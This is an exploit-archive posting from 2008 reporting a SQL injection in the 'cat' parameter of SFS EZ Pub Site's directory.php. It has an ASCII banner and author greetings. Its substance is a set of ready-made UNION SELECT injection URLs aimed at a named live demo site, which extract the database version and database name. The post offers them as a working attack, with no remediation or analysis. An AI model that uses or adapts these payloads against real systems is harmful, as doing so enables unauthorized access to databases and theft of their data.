[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SFS EZ Pub Site (directory.php cat) SQL Injection Vulnerability
# Published : 2008-11-01
# Author : Hakxer
# Previous Title : SFS EZ Webstore (where) Remote SQL Injection Vulnerability
# Next Title : SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability
###########################################################################
______ __ __ ______ __ ______
/ ____/___ / / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/ / / / / __ / __ / _ / ___/ ___/ / / / _ / __ `/ __ `__
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/__, / /_/ ____/____/__,_/___/_/ /____/ /_/ ___/__,_/_/ /_/ /_/
/____/
# Discovered by : Hakxer
# Type Gap : SQL Injection
# Script : SFS EZ Pub Site
# Greetz : Allah , Egyptian x hacker , Str0ke :)
##########################################################################
# [~] Poc :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# [~] Exploit :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
OR
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# Proud To be a Muslim #
#_=END=_#
# www.Syue.com [2008-11-01]